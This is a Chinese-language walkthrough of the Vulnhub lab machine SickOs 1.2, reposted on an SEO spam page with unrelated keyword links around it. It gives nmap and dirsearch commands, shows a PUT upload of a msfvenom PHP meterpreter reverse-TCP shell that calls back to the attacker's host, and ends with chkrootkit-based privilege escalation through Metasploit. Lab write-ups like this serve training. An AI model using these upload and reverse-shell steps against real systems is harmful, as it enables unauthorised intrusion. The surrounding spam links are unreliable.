当前位置: 首页 > wzjs >正文

那家b2c网站建设报价营销app

那家b2c网站建设报价,营销app,网站建设联系电话,邵阳整站优化一、靶机介绍 靶机基本信息: 靶机下载链接https://www.vulnhub.com/entry/sickos-12,144/作者D4rk发布日期2016年4月27日难度中等 二、信息搜集 记得将网络连接改成nat模式 1、 目标IP探测 目标IP:192.168.155.186 2、 端口扫描 nmap -p- --…

一、靶机介绍

靶机基本信息:

靶机下载链接https://www.vulnhub.com/entry/sickos-12,144/
作者D4rk
发布日期2016年4月27日
难度中等

二、信息搜集

记得将网络连接改成nat模式
1、    目标IP探测
 
目标IP:192.168.155.186
2、    端口扫描

nmap -p- --min-rate 1000 -T4 192.168.155.186


 

   nmap -p22,80 -sV -sC -A  --min-rate 1000 -T4 192.168.155.186


 
三、GETshell


信息不多一个ssh,一个站点。先去站点看看情况
给出一张图片:病毒真的是杀毒公司为了钱而制作的吗
 
查看源码没有什么东西,目录扫描一遍
dirsearch -u http://192.168.155.186
 

好像没有什么有用信息
 
可以确定入口了,查询一下:

searchsploit lighttp


 
但是没有看到1.4.28版本对应漏洞
查询一下网址请求方法:

curl http://192.168.155.186/test/ -vv -X OPTIONS



看到有PUT方法,结合之前的访问目录,猜测文件上传访问反弹shell
制作php脚本

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.155.166 LPORT=443 >shell4431.php



上传:

curl -v -H "Expect:" -T shell4431.php "http://192.168.155.186/test/"



打开msf:

use exploit/multi/handler
show options
set lhost IP
set lport 443
run


 
成功
 

四、提权


内核提权,查看发行版本:

cat /etc/os-release



 
有脚本但是不行
 
列出与系统定时目录相关的文件和配置

ls -la /etc/cron*



找到一个 chkrootkit
有漏洞利用,一个说明文档一个msf脚本
 
将会话放置后台
 


进入特定会话
 

 set seesion 1


成功
 
完成
 

http://www.dtcms.com/wzjs/457355.html

相关文章:

  • 西宁网站优化品牌整合营销方案
  • js建设网站外网app拉新项目推广代理
  • 6免费建站的网站搜索引擎优化的主要工作
  • 视频网站做游戏分发网站收录入口
  • 找网站建设公司哪家好浙江网站建设平台
  • 模板 网站企业管理培训课程报名
  • 专业的网站制作seo免费课程
  • 井研移动网站建设设计公司排名前十强
  • 重庆市建设考试报名网站腾讯云域名购买
  • 合川网站建设公司百度指数分析工具
  • mac系统使用wordpress百度有专做优化的没
  • 企拓客app靠谱吗龙岗seo网络推广
  • wordpress 评论 模块seo如何优化关键词排名
  • 温州门户网站建设推广文章的推广渠道
  • 哪家公司建网站最好百度搜索引擎优化方式
  • 中国互联网十大巨头公司成都网站建设seo
  • 网站建设哪家好采用苏州久远网络山西seo关键词优化软件搜索
  • 潍坊大型做网站建设的公司网店代运营合同
  • 网站制作视频教学百度账号购买1元40个
  • ttkefu在线客服系统网站关键词优化有用吗
  • 闲鱼上面给人做网站造退款排名优化网站
  • 新疆最新消息今天1例湖南seo网站多少钱
  • wordpress打开网站加速色盲测试图第六版
  • 优秀的网页模板网站成品网站货源1688在线
  • 青岛网站建设公司大全漳州seo网站快速排名
  • 淄博哪有做网站的搜索排行榜
  • 网站做301好不好武汉网站seo推广公司
  • 深圳做小程序网站开发怎样注册自己的网站
  • 没有数据库的网站手机上如何制作自己的网站
  • 互联网法律服务平台广州seo公司哪个比较好